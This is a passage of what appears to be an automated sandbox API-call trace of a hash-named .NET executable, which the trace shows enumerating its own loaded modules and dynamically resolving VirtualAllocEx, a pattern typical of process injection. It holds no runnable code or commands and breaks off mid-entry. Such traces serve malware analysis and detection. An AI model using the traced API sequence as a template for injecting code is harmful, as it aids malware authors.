"c:\\windows\\syswow64\\apphelp.dll")) returned 0x1f [0167.463] GetModuleInformation (in: hProcess=0x2e4, hModule=0x74380000, lpmodinfo=0x231020c, cb=0xc | out: lpmodinfo=0x231020c*(lpBaseOfDll=0x74380000, SizeOfImage=0x7b000, EntryPoint=0x7439e970)) returned 1 [0167.463] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x74380000, lpBaseName=0x8b4098, nSize=0x800 | out: lpBaseName="ADVAPI32.dll") returned 0xc [0167.464] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x74380000, lpFilename=0x8b4098, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ADVAPI32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll")) returned 0x20 [0167.464] GetModuleInformation (in: hProcess=0x2e4, hModule=0x75a40000, lpmodinfo=0x2312320, cb=0xc | out: lpmodinfo=0x2312320*(lpBaseOfDll=0x75a40000, SizeOfImage=0xbe000, EntryPoint=0x75a75630)) returned 1 [0167.464] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x75a40000, lpBaseName=0x8b4098, nSize=0x800 | out: lpBaseName="msvcrt.dll") returned 0xa [0167.464] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x75a40000, lpFilename=0x8b4098, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll")) returned 0x1e [0167.465] GetModuleInformation (in: hProcess=0x2e4, hModule=0x758c0000, lpmodinfo=0x231442c, cb=0xc | out: lpmodinfo=0x231442c*(lpBaseOfDll=0x758c0000, SizeOfImage=0x44000, EntryPoint=0x758d9d80)) returned 1 [0167.465] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x758c0000, lpBaseName=0x8b4098, nSize=0x800 | out: lpBaseName="sechost.dll") returned 0xb [0167.465] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x758c0000, lpFilename=0x8b4098, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll")) returned 0x1f [0167.465] GetModuleInformation (in: hProcess=0x2e4, hModule=0x75970000, lpmodinfo=0x2316584, cb=0xc | out: lpmodinfo=0x2316584*(lpBaseOfDll=0x75970000, SizeOfImage=0xad000, EntryPoint=0x75984f00)) returned 1 [0167.466] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x75970000, lpBaseName=0x8b4098, nSize=0x800 | out: lpBaseName="RPCRT4.dll") returned 0xa [0167.466] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x75970000, lpFilename=0x8b4098, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\RPCRT4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll")) returned 0x1e [0167.466] GetModuleInformation (in: hProcess=0x2e4, hModule=0x73e40000, lpmodinfo=0x2318690, cb=0xc | out: lpmodinfo=0x2318690*(lpBaseOfDll=0x73e40000, SizeOfImage=0x1e000, EntryPoint=0x73e4b640)) returned 1 [0167.467] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x73e40000, lpBaseName=0x8b4098, nSize=0x800 | out: lpBaseName="SspiCli.dll") returned 0xb [0167.467] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x73e40000, lpFilename=0x8b4098, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\SspiCli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll")) returned 0x1f [0167.467] GetModuleInformation (in: hProcess=0x2e4, hModule=0x73e30000, lpmodinfo=0x231a79c, cb=0xc | out: lpmodinfo=0x231a79c*(lpBaseOfDll=0x73e30000, SizeOfImage=0xa000, EntryPoint=0x73e32a00)) returned 1 [0167.468] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x73e30000, lpBaseName=0x8b4098, nSize=0x800 | out: lpBaseName="CRYPTBASE.dll") returned 0xd [0167.468] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x73e30000, lpFilename=0x8b4098, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\CRYPTBASE.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll")) returned 0x21 [0167.468] GetModuleInformation (in: hProcess=0x2e4, hModule=0x77040000, lpmodinfo=0x231c8b0, cb=0xc | out: lpmodinfo=0x231c8b0*(lpBaseOfDll=0x77040000, SizeOfImage=0x58000, EntryPoint=0x770825c0)) returned 1 [0167.469] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x77040000, lpBaseName=0x8b4098, nSize=0x800 | out: lpBaseName="bcryptPrimitives.dll") returned 0x14 [0167.469] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x77040000, lpFilename=0x8b4098, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\bcryptPrimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll")) returned 0x28 [0167.469] GetModuleInformation (in: hProcess=0x2e4, hModule=0x6c8d0000, lpmodinfo=0x231e9e4, cb=0xc | out: lpmodinfo=0x231e9e4*(lpBaseOfDll=0x6c8d0000, SizeOfImage=0x79000, EntryPoint=0x6c8df82a)) returned 1 [0167.470] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x6c8d0000, lpBaseName=0x8b4098, nSize=0x800 | out: lpBaseName="mscoreei.dll") returned 0xc [0167.470] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x6c8d0000, lpFilename=0x8b4098, nSize=0x800 | out: lpFilename="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscoreei.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\mscoreei.dll")) returned 0x3a [0167.470] GetModuleInformation (in: hProcess=0x2e4, hModule=0x74a00000, lpmodinfo=0x2320b2c, cb=0xc | out: lpmodinfo=0x2320b2c*(lpBaseOfDll=0x74a00000, SizeOfImage=0x45000, EntryPoint=0x74a1de90)) returned 1 [0167.471] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x74a00000, lpBaseName=0x8b4098, nSize=0x800 | out: lpBaseName="SHLWAPI.dll") returned 0xb [0167.471] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x74a00000, lpFilename=0x8b4098, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\SHLWAPI.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll")) returned 0x1f [0167.471] GetModuleInformation (in: hProcess=0x2e4, hModule=0x74400000, lpmodinfo=0x2322c38, cb=0xc | out: lpmodinfo=0x2322c38*(lpBaseOfDll=0x74400000, SizeOfImage=0x1bd000, EntryPoint=0x744e2a10)) returned 1 [0167.472] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x74400000, lpBaseName=0x8b4098, nSize=0x800 | out: lpBaseName="combase.dll") returned 0xb [0167.472] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x74400000, lpFilename=0x8b4098, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll")) returned 0x1f [0167.472] GetModuleInformation (in: hProcess=0x2e4, hModule=0x74a50000, lpmodinfo=0x2324d44, cb=0xc | out: lpmodinfo=0x2324d44*(lpBaseOfDll=0x74a50000, SizeOfImage=0x14f000, EntryPoint=0x74b06820)) returned 1 [0167.473] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x74a50000, lpBaseName=0x8b4098, nSize=0x800 | out: lpBaseName="GDI32.dll") returned 0x9 [0167.473] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x74a50000, lpFilename=0x8b4098, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\GDI32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll")) returned 0x1d [0167.474] GetModuleInformation (in: hProcess=0x2e4, hModule=0x755c0000, lpmodinfo=0x2326ed4, cb=0xc | out: lpmodinfo=0x2326ed4*(lpBaseOfDll=0x755c0000, SizeOfImage=0x147000, EntryPoint=0x755d1cf0)) returned 1 [0167.474] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x755c0000, lpBaseName=0x8b4098, nSize=0x800 | out: lpBaseName="USER32.dll") returned 0xa [0167.474] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x755c0000, lpFilename=0x8b4098, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\USER32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll")) returned 0x1e [0167.475] GetModuleInformation (in: hProcess=0x2e4, hModule=0x74990000, lpmodinfo=0x2328fe0, cb=0xc | out: lpmodinfo=0x2328fe0*(lpBaseOfDll=0x74990000, SizeOfImage=0x2b000, EntryPoint=0x74995680)) returned 1 [0167.475] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x74990000, lpBaseName=0x8b4098, nSize=0x800 | out: lpBaseName="IMM32.DLL") returned 0x9 [0167.476] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x74990000, lpFilename=0x8b4098, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\IMM32.DLL" (normalized: "c:\\windows\\syswow64\\imm32.dll")) returned 0x1d [0167.476] GetModuleInformation (in: hProcess=0x2e4, hModule=0x77030000, lpmodinfo=0x232b0e4, cb=0xc | out: lpmodinfo=0x232b0e4*(lpBaseOfDll=0x77030000, SizeOfImage=0xc000, EntryPoint=0x77033930)) returned 1 [0167.476] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x77030000, lpBaseName=0x8b4098, nSize=0x800 | out: lpBaseName="kernel.appcore.dll") returned 0x12 [0167.477] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x77030000, lpFilename=0x8b4098, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll")) returned 0x26 [0167.477] GetModuleInformation (in: hProcess=0x2e4, hModule=0x6d310000, lpmodinfo=0x232d210, cb=0xc | out: lpmodinfo=0x232d210*(lpBaseOfDll=0x6d310000, SizeOfImage=0x8000, EntryPoint=0x6d3117b0)) returned 1 [0167.478] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x6d310000, lpBaseName=0x8b4098, nSize=0x800 | out: lpBaseName="VERSION.dll") returned 0xb [0167.478] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x6d310000, lpFilename=0x8b4098, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\VERSION.dll" (normalized: "c:\\windows\\syswow64\\version.dll")) returned 0x1f [0167.479] GetModuleInformation (in: hProcess=0x2e4, hModule=0x6b6f0000, lpmodinfo=0x232f31c, cb=0xc | out: lpmodinfo=0x232f31c*(lpBaseOfDll=0x6b6f0000, SizeOfImage=0x6b1000, EntryPoint=0x6b705d20)) returned 1 [0167.479] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x6b6f0000, lpBaseName=0x8b4098, nSize=0x800 | out: lpBaseName="clr.dll") returned 0x7 [0167.480] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x6b6f0000, lpFilename=0x8b4098, nSize=0x800 | out: lpFilename="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\clr.dll")) returned 0x35 [0167.480] GetModuleInformation (in: hProcess=0x2e4, hModule=0x6c650000, lpmodinfo=0x233144c, cb=0xc | out: lpmodinfo=0x233144c*(lpBaseOfDll=0x6c650000, SizeOfImage=0xf5000, EntryPoint=0x6c6a4160)) returned 1 [0167.480] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x6c650000, lpBaseName=0x8b4098, nSize=0x800 | out: lpBaseName="MSVCR120_CLR0400.dll") returned 0x14 [0167.481] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x6c650000, lpFilename=0x8b4098, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\MSVCR120_CLR0400.dll" (normalized: "c:\\windows\\syswow64\\msvcr120_clr0400.dll")) returned 0x28 [0167.481] GetModuleInformation (in: hProcess=0x2e4, hModule=0x69850000, lpmodinfo=0x2333580, cb=0xc | out: lpmodinfo=0x2333580*(lpBaseOfDll=0x69850000, SizeOfImage=0x1228000, EntryPoint=0x0)) returned 1 [0167.482] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x69850000, lpBaseName=0x8b4098, nSize=0x800 | out: lpBaseName="mscorlib.ni.dll") returned 0xf [0167.482] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x69850000, lpFilename=0x8b4098, nSize=0x800 | out: lpFilename="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\mscorlib\\8062d427acd64e37f4fded7b00f4a869\\mscorlib.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\mscorlib\\8062d427acd64e37f4fded7b00f4a869\\mscorlib.ni.dll")) returned 0x68 [0167.483] GetModuleInformation (in: hProcess=0x2e4, hModule=0x75360000, lpmodinfo=0x2335728, cb=0xc | out: lpmodinfo=0x2335728*(lpBaseOfDll=0x75360000, SizeOfImage=0xeb000, EntryPoint=0x7539d650)) returned 1 [0167.483] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x75360000, lpBaseName=0x8b4098, nSize=0x800 | out: lpBaseName="ole32.dll") returned 0x9 [0167.484] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x75360000, lpFilename=0x8b4098, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll")) returned 0x1d [0167.484] GetModuleInformation (in: hProcess=0x2e4, hModule=0x6fef0000, lpmodinfo=0x233782c, cb=0xc | out: lpmodinfo=0x233782c*(lpBaseOfDll=0x6fef0000, SizeOfImage=0x75000, EntryPoint=0x6ff29a60)) returned 1 [0167.485] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x6fef0000, lpBaseName=0x8b4098, nSize=0x800 | out: lpBaseName="uxtheme.dll") returned 0xb [0167.485] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x6fef0000, lpFilename=0x8b4098, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll")) returned 0x1f [0167.486] GetModuleInformation (in: hProcess=0x2e4, hModule=0x6f820000, lpmodinfo=0x2339938, cb=0xc | out: lpmodinfo=0x2339938*(lpBaseOfDll=0x6f820000, SizeOfImage=0x13000, EntryPoint=0x6f829950)) returned 1 [0167.486] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x6f820000, lpBaseName=0x8b4098, nSize=0x800 | out: lpBaseName="CRYPTSP.dll") returned 0xb [0167.487] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x6f820000, lpFilename=0x8b4098, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\CRYPTSP.dll" (normalized: "c:\\windows\\syswow64\\cryptsp.dll")) returned 0x1f [0167.488] GetModuleInformation (in: hProcess=0x2e4, hModule=0x6f7f0000, lpmodinfo=0x233ba44, cb=0xc | out: lpmodinfo=0x233ba44*(lpBaseOfDll=0x6f7f0000, SizeOfImage=0x2f000, EntryPoint=0x6f8095e0)) returned 1 [0167.488] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x6f7f0000, lpBaseName=0x8b4098, nSize=0x800 | out: lpBaseName="rsaenh.dll") returned 0xa [0167.489] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x6f7f0000, lpFilename=0x8b4098, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll")) returned 0x1e [0167.489] GetModuleInformation (in: hProcess=0x2e4, hModule=0x73ae0000, lpmodinfo=0x233db50, cb=0xc | out: lpmodinfo=0x233db50*(lpBaseOfDll=0x73ae0000, SizeOfImage=0x1b000, EntryPoint=0x73ae9050)) returned 1 [0167.490] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x73ae0000, lpBaseName=0x8b4098, nSize=0x800 | out: lpBaseName="bcrypt.dll") returned 0xa [0167.490] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x73ae0000, lpFilename=0x8b4098, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll")) returned 0x1e [0167.491] GetModuleInformation (in: hProcess=0x2e4, hModule=0x6c850000, lpmodinfo=0x233fc5c, cb=0xc | out: lpmodinfo=0x233fc5c*(lpBaseOfDll=0x6c850000, SizeOfImage=0x7e000, EntryPoint=0x6c851140)) returned 1 [0167.492] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x6c850000, lpBaseName=0x8b4098, nSize=0x800 | out: lpBaseName="clrjit.dll") returned 0xa [0167.492] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x6c850000, lpFilename=0x8b4098, nSize=0x800 | out: lpFilename="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clrjit.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\clrjit.dll")) returned 0x38 [0167.493] GetModuleInformation (in: hProcess=0x2e4, hModule=0x75b00000, lpmodinfo=0x2341d9c, cb=0xc | out: lpmodinfo=0x2341d9c*(lpBaseOfDll=0x75b00000, SizeOfImage=0x92000, EntryPoint=0x75b38cf0)) returned 1 [0167.493] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x75b00000, lpBaseName=0x8b4098, nSize=0x800 | out: lpBaseName="OLEAUT32.dll") returned 0xc [0167.494] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x75b00000, lpFilename=0x8b4098, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\OLEAUT32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll")) returned 0x20 [0167.494] GetModuleInformation (in: hProcess=0x2e4, hModule=0x6ad40000, lpmodinfo=0x2343eb0, cb=0xc | out: lpmodinfo=0x2343eb0*(lpBaseOfDll=0x6ad40000, SizeOfImage=0x9ac000, EntryPoint=0x0)) returned 1 [0167.495] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x6ad40000, lpBaseName=0x8b4098, nSize=0x800 | out: lpBaseName="System.ni.dll") returned 0xd [0167.496] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x6ad40000, lpFilename=0x8b4098, nSize=0x800 | out: lpFilename="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System\\cc4e5d110dd318e8b7d61a9ed184ab74\\System.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system\\cc4e5d110dd318e8b7d61a9ed184ab74\\system.ni.dll")) returned 0x64 [0167.496] GetModuleInformation (in: hProcess=0x2e4, hModule=0x6c4c0000, lpmodinfo=0x234604c, cb=0xc | out: lpmodinfo=0x234604c*(lpBaseOfDll=0x6c4c0000, SizeOfImage=0x18d000, EntryPoint=0x0)) returned 1 [0167.497] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x6c4c0000, lpBaseName=0x8b4098, nSize=0x800 | out: lpBaseName="System.Drawing.ni.dll") returned 0x15 [0167.498] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x6c4c0000, lpFilename=0x8b4098, nSize=0x800 | out: lpFilename="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Drawing\\9b645a48c9bcfc95aaadf6a069bb4ebe\\System.Drawing.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.drawing\\9b645a48c9bcfc95aaadf6a069bb4ebe\\system.drawing.ni.dll")) returned 0x74 [0167.498] GetModuleInformation (in: hProcess=0x2e4, hModule=0x68bf0000, lpmodinfo=0x2348324, cb=0xc | out: lpmodinfo=0x2348324*(lpBaseOfDll=0x68bf0000, SizeOfImage=0xc59000, EntryPoint=0x0)) returned 1 [0167.499] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x68bf0000, lpBaseName=0x8b4098, nSize=0x800 | out: lpBaseName="System.Windows.Forms.ni.dll") returned 0x1b [0167.499] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x68bf0000, lpFilename=0x8b4098, nSize=0x800 | out: lpFilename="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Windows.Forms\\8cd2187094ba6cade0ca0fab4f932654\\System.Windows.Forms.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.windows.forms\\8cd2187094ba6cade0ca0fab4f932654\\system.windows.forms.ni.dll")) returned 0x80 [0167.500] GetModuleInformation (in: hProcess=0x2e4, hModule=0x6c7b0000, lpmodinfo=0x234a514, cb=0xc | out: lpmodinfo=0x234a514*(lpBaseOfDll=0x6c7b0000, SizeOfImage=0x92000, EntryPoint=0x6c7bdd60)) returned 1 [0167.501] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x6c7b0000, lpBaseName=0x8b4098, nSize=0x800 | out: lpBaseName="comctl32.dll") returned 0xc [0167.501] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x6c7b0000, lpFilename=0x8b4098, nSize=0x800 | out: lpFilename="C:\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll")) returned 0x78 [0167.502] GetModuleInformation (in: hProcess=0x2e4, hModule=0x6f730000, lpmodinfo=0x234c6d8, cb=0xc | out: lpmodinfo=0x234c6d8*(lpBaseOfDll=0x6f730000, SizeOfImage=0x1d000, EntryPoint=0x6f733b10)) returned 1 [0167.503] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x6f730000, lpBaseName=0x8b4098, nSize=0x800 | out: lpBaseName="dwmapi.dll") returned 0xa [0167.503] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x6f730000, lpFilename=0x8b4098, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll")) returned 0x1e [0167.504] GetModuleInformation (in: hProcess=0x2e4, hModule=0x6c3f0000, lpmodinfo=0x234e7e4, cb=0xc | out: lpmodinfo=0x234e7e4*(lpBaseOfDll=0x6c3f0000, SizeOfImage=0xc5000, EntryPoint=0x0)) returned 1 [0167.505] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x6c3f0000, lpBaseName=0x8b4098, nSize=0x800 | out: lpBaseName="System.Runtime.Remoting.ni.dll") returned 0x1e [0167.506] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x6c3f0000, lpFilename=0x8b4098, nSize=0x800 | out: lpFilename="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Runt73a1fc9d#\\8d483c399064a7bdd1f920630af5a265\\System.Runtime.Remoting.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.runt73a1fc9d#\\8d483c399064a7bdd1f920630af5a265\\system.runtime.remoting.ni.dll")) returned 0x83 [0167.506] GetModuleInformation (in: hProcess=0x2e4, hModule=0x6d300000, lpmodinfo=0x23509e0, cb=0xc | out: lpmodinfo=0x23509e0*(lpBaseOfDll=0x6d300000, SizeOfImage=0xd000, EntryPoint=0x6d3063e0)) returned 1 [0167.507] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x6d300000, lpBaseName=0x8b4098, nSize=0x800 | out: lpBaseName="amsi.dll") returned 0x8 [0167.508] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x6d300000, lpFilename=0x8b4098, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\amsi.dll" (normalized: "c:\\windows\\syswow64\\amsi.dll")) returned 0x1c [0167.508] GetModuleInformation (in: hProcess=0x2e4, hModule=0x684d0000, lpmodinfo=0x2352ae4, cb=0xc | out: lpmodinfo=0x2352ae4*(lpBaseOfDll=0x684d0000, SizeOfImage=0x712000, EntryPoint=0x0)) returned 1 [0167.525] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x684d0000, lpBaseName=0x8b4098, nSize=0x800 | out: lpBaseName="System.Core.ni.dll") returned 0x12 [0167.526] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x684d0000, lpFilename=0x8b4098, nSize=0x800 | out: lpFilename="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Core\\abad45b9cc652ba7e38c4c837234c0ab\\System.Core.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.core\\abad45b9cc652ba7e38c4c837234c0ab\\system.core.ni.dll")) returned 0x6e [0167.527] GetModuleInformation (in: hProcess=0x2e4, hModule=0x74920000, lpmodinfo=0x2354ca0, cb=0xc | out: lpmodinfo=0x2354ca0*(lpBaseOfDll=0x74920000, SizeOfImage=0x6000, EntryPoint=0x74921460)) returned 1 [0167.528] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x74920000, lpBaseName=0x8b4098, nSize=0x800 | out: lpBaseName="psapi.dll") returned 0x9 [0167.529] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x74920000, lpFilename=0x8b4098, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\psapi.dll" (normalized: "c:\\windows\\syswow64\\psapi.dll")) returned 0x1d [0167.530] CloseHandle (hObject=0x2e4) returned 1 [0167.530] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VirtualAllocEx", cchWideChar=14, lpMultiByteStr=0x19cb74, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VirtualAllocExd", lpUsedDefaultChar=0x0) returned 14 [0167.530] GetProcAddress (hModule=0x74610000, lpProcName="VirtualAllocEx") returned 0x74652730 [0167.541] GetCurrentProcessId () returned 0x1318 [0167.541] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1318) returned 0x2e4 [0167.541] EnumProcessModules (in: hProcess=0x2e4, lphModule=0x2357758, cb=0x100, lpcbNeeded=0x19cb68 | out: lphModule=0x2357758, lpcbNeeded=0x19cb68) returned 1 [0167.542] GetModuleInformation (in: hProcess=0x2e4, hModule=0x400000, lpmodinfo=0x2357898, cb=0xc | out: lpmodinfo=0x2357898*(lpBaseOfDll=0x400000, SizeOfImage=0x76000, EntryPoint=0x0)) returned 1 [0167.542] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x400000, lpBaseName=0x8b43d8, nSize=0x800 | out: lpBaseName="977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe") returned 0x44 [0167.542] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x400000, lpFilename=0x8b43d8, nSize=0x800 | out: lpFilename="C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe")) returned 0x62 [0167.543] GetModuleInformation (in: hProcess=0x2e4, hModule=0x77110000, lpmodinfo=0x2359abc, cb=0xc | out: lpmodinfo=0x2359abc*(lpBaseOfDll=0x77110000, SizeOfImage=0x17b000, EntryPoint=0x0)) returned 1 [0167.543] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x77110000, lpBaseName=0x8b43d8, nSize=0x800 | out: lpBaseName="ntdll.dll") returned 0x9 [0167.543] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x77110000, lpFilename=0x8b43d8, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll")) returned 0x1d [0167.543] GetModuleInformation (in: hProcess=0x2e4, hModule=0x6d320000, lpmodinfo=0x235bbc0, cb=0xc | out: lpmodinfo=0x235bbc0*(lpBaseOfDll=0x6d320000, SizeOfImage=0x59000, EntryPoint=0x6d330780)) returned 1 [0167.544] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x6d320000, lpBaseName=0x8b43d8, nSize=0x800 | out: lpBaseName="MSCOREE.DLL") returned 0xb [0167.544] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x6d320000, lpFilename=0x8b43d8, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\MSCOREE.DLL" (normalized: "c:\\windows\\syswow64\\mscoree.dll")) returned 0x1f [0167.544] GetModuleInformation (in: hProcess=0x2e4, hModule=0x74610000, lpmodinfo=0x235dccc, cb=0xc | out: lpmodinfo=0x235dccc*(lpBaseOfDll=0x74610000, SizeOfImage=0xe0000, EntryPoint=0x74623980)) returned 1 [0167.544] GetModuleBaseNameW (in: hProcess=0x2e4, hModule=0x74610000, lpBaseName=0x8b43d8, nSize=0x800 | out: lpBaseName="KERNEL32.dll") returned 0xc [0167.545] GetModuleFileNameExW (in: hProcess=0x2e4, hModule=0x74610000, lpFilename=0x8b43d8, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\KERNEL32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll")) returned 0x20 [0167.545] GetModuleInformation (in: hProcess=0x2e4, hModule=0x75710000, lpmodinfo=0x235fde0, cb=0xc | out: lpmodinfo=0x235fde0*(lpBaseOfDll=0x75710000, SizeOfImage=0x17e000, 